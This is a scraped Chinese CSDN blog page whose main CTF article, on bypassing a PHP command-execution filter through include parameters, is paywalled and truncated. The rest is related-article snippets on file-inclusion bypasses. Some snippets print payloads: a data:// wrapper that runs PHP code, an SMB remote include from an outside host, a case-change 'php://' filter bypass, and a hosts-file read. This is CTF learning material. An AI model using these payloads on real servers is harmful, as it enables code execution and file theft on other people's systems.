命令执行可以用include传参绕过的方式

最新推荐文章于 2024-05-24 17:01:23 发布
最新推荐文章于 2024-05-24 17:01:23 发布
阅读量912 收藏
点赞数
分类专栏: ctf练习 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/menghuangjh/article/details/109786953
版权
博客探讨了在PHP环境中,如何通过include函数的传参方式来绕过不能使用括号和特定字符串的限制进行命令执行。提到了payload构造方法,并暗示了使用短标签作为绕过策略。
摘要由CSDN通过智能技术生成 
<?php
    // flag在flag.php
    if(isset($_GET['a'])){
   
        if(preg_match('/\(.*\)/', $_GET[
最低0.47元/天 解锁文章
秀秀宏
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
asp #include命令
10-30
asp #include命令
linux c++ 调用shell命令,保存执行结果 示例
01-07
下面的代码用于在c++函数里面调用shell,并且执行命令,取回命令执行结果。 #include #include #include #include int main() { const int SIZE = 64; const int MAX_RESPONSE_SIZE = 65535; char charBuff[SIZE...
php文件包含漏洞(allow_url_include=Off)的绕过方法
weixin_30323961的博客
05-31 2873
分享几个当allow_url_include = Off时的文件包含漏洞的绕过方法。 假设服务端的php代码(aaa.php)如下图所示: 第1种:smb协议 Payload:http://127.0.0.1/aaa.php?path=\\43.5*.**.74\ica\abc1238.htm 这种方法只适用于Windows类型的网站服务器,不能用于Linux服务器。 首先在...
CTF 总结02:preg_match()绕过
最新发布
Innocence_0的博客
05-24 511
链接在此:[PHP: preg_match - Manual](https://www.php.net/manual/zh/function.preg-作为匹配检查的大函数,可以带五个小参数:pattern、subject、matches、flags、offset,其中前两个:pattern、subject是必须要填写的后三个不填写的话会有自动的默认值需要被检查的字符串(通常就是我们传到网页的字符串)~需要被比较的字符串(通常就是被WAF拉黑的字符串)~
文件包含漏洞及绕过方法(以php为例)
热门推荐
HMX404的博客
09-27 1万+
一,文件包含漏洞的由来 简单的来说,为了减少“重复造轮子”引入了文件包含函数,可以直接使用文件中的文件和代码。当通过动态获文件时,或者需要引用网络上其他文件时,用户通过对变量值的修改访问规定的文件,但是未对变量值进行校验,导致有了可乘之机,一般在php中常见。 <?php $file = $_GET('file'); include($file); #除此之外还有Include_once;require;require_once;highlight_file; #show_source;readfil
ctf php绕过%3c,CTF-攻防世界-Web_php_include(PHP文件包含)
weixin_39606244的博客
03-12 692
题目和进入题目出现的页面: 从给出的代码来看,参数名是page,并且过滤了php协议。正好之前学过文件包含漏洞,看能不能学以致用。。。输入:http://111.198.29.45:54883/index.php?page=data:text/plain,%3C?php%20phpinfo();?%3E返回phpinfo页面,并找到了apache日志的路径:输入:http://111....
漏洞复现篇——文件包含漏洞(DVWA靶场---File Inclusion【低中高级绕过】)
爱国小白帽
02-19 3875
实验环境: PHPstudy DVWA靶场 菜刀 环境搭建 1、将DVWA Security級別换成low 2、打开php的配置文件,搜索allow_url_include,把off换成on,然后重启 模拟实验 本地文件包含(LFI) 1、点击File Inclusion中的file1.php 2、在图示位置输入C:\Windows\System32\drivers\etc\hosts...
百度杯ctf2月场web-include
Radiation's Blog
03-14 2051
打开题目链接,显示如下内容:显示的代码如下:<?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); }可以知道这是个文件包含的题目,只要我们去读出包含有flag的文件就可以了,由于我们不知道包含于哪个文件
linux使用管道命令执行ps获取cpu与内存占用率
09-15
### Linux使用管道命令执行ps获取CPU与内存占用率 在Linux环境下,经常需要对系统资源进行监控,尤其是CPU和内存的使用情况。本文档将详细介绍如何利用Linux的管道命令配合`ps`命令来获取当前进程的CPU和内存占用率...
include的使用方式
09-06
下面将详细介绍`#include`的使用方式,特别是结合Microsoft Visual C++(VC)环境下的路径设置和使用技巧。 ### 1. 系统目录 在VC环境下,系统默认会搜索一系列预设的目录来查找`#include`指令指定的头文件。这些...
文件包含常见绕过方法
1stPeak's Blog
06-15 7709
文件包含原理 开发人员将相同函数写入单独的文件中,需要使用某个函数直接调用此文件,无需再次编写,这种文件调用过程称为文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数 include: 包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行 include_once: 这个函数跟和include语句类似,唯一区别是如果该文件中已经被包含过,则不会再次包含 req
攻防世界-Web_php_include [文件包含]
weixin_53146913的博客
04-15 546
意思是当传给page的参数里有php://时,会自动过滤掉,但是此函数对大小写敏感,构造Php://就不起作用了,而stristr()函数对大小写不敏感噢。 一、双写、大小写绕过: 大小写可直接绕过。 但是由于源代码中是while循环过滤,所以我们的双写过滤就G了QAQ。 二、利用hello的回显 我们构造payload,首先要构造hello这个参数我们必须先让传进的page参数为真 page参数用http伪协议访问127.0.0.1这个条件肯定为真 payload: ?pa.
Makefile中的文件包含(使用include或者-include
主要记录嵌入式学习与开发过程。
07-06 2789
以下内容源于C语言中文网的学习与整理,非原创,如有侵权请告知删除。
攻防世界刷题记录
Huamang的博客
02-28 258
Web_php_include 过滤了php://,后面有include文件包含,这种过滤不是正则过滤,可以通过大小写绕过 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 由于不知道flag在哪个文件里面,
CTFshow——PHP特性(上)
D.MIND 的博客
02-09 1606
web89——preg_match函数 、数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } preg
XCTF-攻防世界CTF平台-Web类——4、Web_php_includephp中strstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 3043
目录标题一级目录方法一、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、一句话木马连接后台方法五、data://伪协议+一句话木马 一级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 515
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
Buuctf 刷题记录
m0_62706061的博客
10-12 1713
php反序列化绕过之,过滤\00*\00等
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值